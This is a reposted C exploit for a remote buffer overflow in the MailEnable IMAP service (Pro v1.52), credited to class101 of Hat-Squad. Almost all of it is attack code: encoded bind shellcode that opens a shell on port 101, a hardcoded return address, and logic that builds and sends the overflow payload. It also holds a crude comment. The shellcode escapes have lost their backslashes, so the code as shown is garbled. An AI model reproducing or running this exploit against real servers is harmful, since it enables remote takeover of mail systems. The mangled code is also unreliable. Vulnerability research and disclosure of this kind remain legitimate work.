信息来源:
www.mailenable.com复制内容到剪贴板
代码:
/*
MailEnable , IMAP Service, Remote Buffer Overflow Exploit v0.4
Homepage : [url]www.mailenable.com[/url]
Affected versions: Pro v1.52
Enterprise v1.01
Bug discovery : Nima Majidi at [url]www.hat-squad.com[/url]
Exploit code : class101 at [url]www.hat-squad.com[/url]
& dfind.kd-team.com
Fix : [url]http://mailenable.com/hotfix/MEIMAPS-HF041125.zip[/url]
Compilation : 101_ncat.cpp ......... Win32 (MSVC,cygwin)
101_ncat.c ........... Linux
*/
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif
file://BIND shellcode port 101, XORed 0x88, thanx HDMoore.
char scode[] =
"xEB"
"x0Fx58x80x30x88x40x81x38x68x61x63x6Bx75xF4xEBx05xE8xECxFFxFF"
"xFFx60xDEx88x88x88xDBxDDxDExDFx03xE4xACx90x03xCDxB4x03xDCx8D"
"xF0x89x62x03xC2x90x03xD2xA8x89x63x6BxBAxC1x03xBCx03x89x66xB9"
"x77x74xB9x48x24xB0x68xFCx8Fx49x47x85x89x4Fx63x7AxB3xF4xACx9C"
"xFDx69x03xD2xACx89x63xEEx03x84xC3x03xD2x94x89x63x03x8Cx03x89"
"x60x63x8AxB9x48xD7xD6xD5xD3x4Ax80x88xD6xE2xB8xD1xECx03x91x03"
"xD3x84x03xD3x94x03x93x03xD3x80xDBxE0x06xC6x86x64x77x5Ex01x4F"
"x09x64x88x89x88x88xDFxDExDBx01x6Dx60xAFx88x88x88x18x89x88x88"
"x3Ex91x90x6Fx2Cx91xF8x61x6DxC1x0ExC1x2Cx92xF8x4Fx2Cx25xA6x61"
"x51x81x7Dx25x43x65x74xB3xDFxDBxBAxD7xBBxBAx88xD3x05xC3xA8xD9"
"x77x5Fx01x57x01x4Bx05xFDx9CxE2x8FxD1xD9xDBx77xBCx07x77xDDx8C"
"xD1x01x8Cx06x6Ax7AxA3xAFxDCx77xBFx77xDDxB8xB9x48xD8xD8xD8xD8"
"xC8xD8xC8xD8x77xDDxA4x01x4FxB9x53xDBxDBxE0x8Ax88x88xEDx01x68"
"xE2x98xD8xDFx77xDDxACxDBxDFx77xDDxA0xDBxDCxDFx77xDDxA8x01x4F"
"xE0xCBxC5xCCx88x01x6Bx0Fx72xB9x48x05xF4xACx24xE2x9DxD1x7Bx23"
"x0Fx72x09x64xDCx88x88x88x4ExCCxACx98xCCxEEx4FxCCxACxB4x89x89"
"x01xF4xACxC0x01xF4xACxC4x01xF4xACxD8x05xCCxACx98xDCxD8xD9xD9"
"xD9xC9xD9xC1xD9xD9xDBxD9x77xFDx88xE0xFAx76x3Bx9Ex77xDDx8Cx77"
"x58x01x6Ex77xFDx88xE0x25x51x8Dx46x77xDDx8Cx01x4BxE0x77x77x77"
"x77x77xBEx77x5Bx77xFDx88xE0xF6x50x6AxFBx77xDDx8CxB9x53xDBx77"
"x58x68x61x63x6Bx90";
static char payload[10000];
char magikcll[]="x7ax8cx01x10"; file://CALL EDI - MEAISP.dll - "Universal"
char gay[]="x4bx2dx4fx54x69x4b"; file://long F0CK to them
void usage(char* us);
#ifdef WIN32
WSADATA wsadata;
#endif
void ver();
int main(int argc,char *argv[])
{
ver();
if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>1)){usage(argv[0]);return -1;}
#ifndef WIN32
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup errorn");return -1;}
#endif
int ip=htonl(inet_addr(argv[2])), sz, port, sizeA, a;
char *target, *os;
if (argc==4){port=atoi(argv[3]);}
else port=143;
if (atoi(argv[1]) == 1){target=magikcll;os="Win2k SP4 Pro Englishn[+] Win2k SP4 Pro Frenchn[+]
Win2k SP4 Server Englishn[+] all Win2k, NT4 (supposed)";}
SOCKET s;fd_set mask;struct timeval timeout;struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1) {printf("[+] socket() errorn");return -1;}
printf("[+] target: %sn",os);
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() errorn");closesocket(s);return -1;}
case 0: {printf("[+] connect() errorn");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
printf("[+] connected, constructing the payload...n");
#ifdef WIN32
Sleep(2000);
#else
Sleep(2);
#endif
sizeA=8202-sizeof(scode);
sz=3+8198+4;
memset(payload,0,sizeof(payload));
strcat(payload,"x41x41x41");
strcat(payload,scode);
for (a=0;a<sizeA;a++){strcat(payload,"x41");}
strcat(payload,target);
strcat(payload,"rn");
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error, the server prolly rebooted.");return -1;}
#ifdef WIN32
Sleep(1000);
#else
Sleep(1);
#endif
printf("[+] size of payload: %dn",sz);
printf("[+] payload send, connect the port 101 to get a shell.n");
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}
void usage(char* us)
{
printf("USAGE: 101_mEna.exe Target Ip Portn");
printf("TARGETS: n");
printf(" [+] 1. Win2k SP4 Pro English (*)n");
printf(" [+] 1. Win2k SP4 Pro French (*)n");
printf(" [+] 1. Win2k SP4 Server English (*)n");
printf(" [+] 1. All Win2K, NT4 n");
printf("NOTE: n");
printf(" The port 143 is default if no port are specifiedn");
printf(" The exploit bind a shellcode to the port 101n");
printf(" A wildcard (*) mean Tested.n");
return;
}
void ver()
{
printf(" n");
printf(" ===================================================[v0.1]====n");
printf(" ======MailEnable, Pro Mail Server for Windows <= v1.52=======n");
printf(" ========IMAP Service, Remote Buffer Overflow Exploit=========n");
printf(" ======coded by class101=============[Hat-Squad.com 2004]=====n");
printf(" =============================================================n");
printf(" n");
}
